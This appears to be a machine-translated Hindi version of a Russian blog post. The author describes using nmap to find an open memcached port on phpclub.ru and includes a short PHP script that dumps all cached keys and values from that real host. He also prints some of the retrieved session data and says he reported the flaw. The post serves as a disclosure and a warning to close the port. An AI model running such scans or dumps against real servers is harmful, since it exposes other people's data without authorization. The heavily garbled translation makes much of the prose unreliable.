एक शांत, गर्म शाम में, मेम के साथ एक कैशिंग सिस्टम विकसित करना और एक सर्वर को जोड़ना, एक विचार ने मुझे अचानक मारा।
यह सब कैसे शुरू हुआ
यह सब इस तथ्य से शुरू हुआ कि मैंने डेबियन परिवार से आरएचईएल परिवार में स्विच किया। लगभग एक सप्ताह पहले, पहली बार मैंने इसे स्वयं किया था (मैं यह नहीं कह सकता कि उबंटू पर यह मेरा अपना था) मैंने एक परियोजना विकसित करने के लिए एक सर्वर खड़ा किया। मैंने नगनेक्स, अपाचे, php अपने हाथों से नियमों को कॉन्फ़िगर किया था - इससे पहले कि उबंटू पर सब कुछ कुछ आदेशों में डाल दिया गया था और खुद के द्वारा काम किया गया था। हालाँकि, कॉन्फ़िगर को सही करते हुए, मैं बेहतर तरीके से समझने लगा कि यह सब वहाँ कैसे काम करता है। शायद इसने मुझे ज्ञापन के बारे में सोचने के लिए प्रेरित किया।
लक्ष्य खोज
सबसे पहले, निश्चित रूप से, मैंने अपनी मशीन पर प्रयोग किया (मैंने आरपीएम से भूल गया और भूल गया) स्थापित किया और परिणाम से आश्चर्यचकित नहीं हुआ, क्योंकि तकनीक
में सर्वर द्वारा स्केलिंग शामिल है और प्राधिकरण के लिए प्रदान नहीं करता है। लेकिन मुझे दृढ़ता से संदेह था कि कोई वास्तविक परियोजना में इस तरह के छेद को छोड़ देगा। लेकिन कुछ भी मुझे इस जाँच से रोका नहीं गया। मैंने पोर्ट स्कैनर के रूप में
नैम्प का इस्तेमाल किया। मुझे माफ कर दो, UFOs लाइन में पहले थे habrahabr.ru, लेकिन उन्होंने गरिमा के साथ परीक्षा उत्तीर्ण की, लेकिन प्रयास 4:
11211 पोर्ट खुला है। कार्रवाई के लिए
मैंने स्थानीय मशीन और सफलता पर एक छोटी स्क्रिप्ट लिखी है:
स्क्रिप्ट को अंतिम रूप देने के बाद:
यहाँ वह है$t= new Memcached (); $t->addServer('phpclub.ru', 11211); $z=$t->getAllKeys(); foreach($z as $k=>$v){ var_dump($t->get($v)); echo $v,'---',$k,"\n"; }
एक हैकर के लिए एक बहुत ही आशाजनक परिणाम प्राप्त हुआ था: सभी डेटा क्रमबद्ध थे। मैंने डेटा का विश्लेषण करना शुरू किया, उनमें मैं faq अनुभाग मेनू के लिए कैश को पहचानने में सक्षम था।
और यहाँ वह है:
linktracking|i:0;bookmarks|a:5:{i:0;s:11:"(())";i:1;s:13:"(())";i:2;s:20:"(())";i:3;s:16:"(())";i:4;s:27:"(( ))";}bookmarklinks|a:5:{i:0;s:7:"katalog";i:1;s:10:"izmenenija";i:2;s:16:"novyekommentarii";i:3;s:12:"pol_zovateli";i:4;s:12:"registracija";}bookmarksfmt|s:157:"ўў ==ЇЇ | ўў ==ЇЇ | ўў ==ЇЇ | ўў ==!!!ЇЇ | ўў ==ЇЇ";show_comments|a:1:{s:24:"qhelp/HowToDisplayErrors";i:0;}'
ईमानदारी से, वह बस ऐसे ही देखा! किसी भी संयोग को संयोग माना जाता है।
और यहाँ इस तरह के कैश के साथ एक पृष्ठ है:
UPD पुरानी तस्वीर पहले img टैग में
आगे क्या है?
और आगे क्या नहीं हुआ और कैसे मैंने मैस्ट्रिंग के तरीकों को लागू नहीं किया है और विनाश को नहीं बताया जाएगा, नैतिकता यह नहीं है;)
स्वाभाविक रूप से, मैंने तुरंत व्यवस्थापक से संपर्क करने की कोशिश की, भेद्यता की सूचना दी और वर्तमान में बंद है।
नैतिक:
बाहरी नेटवर्क से पोर्ट को बंद करना कोई मुश्किल बात नहीं है, लेकिन यहां तक कि phpclub.ru जेडी की दृष्टि भी खो सकती है। यह मामला, एक वास्तविक जीवन उदाहरण दिखाता है कि लोग ऐसी प्रतीत होता है कि प्राथमिक, स्पष्ट चीजों में भी गलतियां कर सकते हैं। पेशेवरों के लिए सर्वर की सुरक्षा और कॉन्फ़िगरेशन पर भरोसा करें।
और यह आशा न करें कि आपका आईपी पता (यहां तक कि इसके साथ संलग्न डोमेन के बिना) स्कैन नहीं किया जाएगा।
सैकड़ो
जेडी हब्बर अपने रास्ते पर हैं, उसके बाद
बॉट क्लोन की एक सेना
है ।
पुनश्च
और कौन जानता है कि इंटरनेट पर और कितने साइकिल बनाए गए हैं और उनमें से कितने ने बाहरी आईपी से याद करने के लिए पहुंच को अवरुद्ध कर दिया है ...
कौन जानता है ...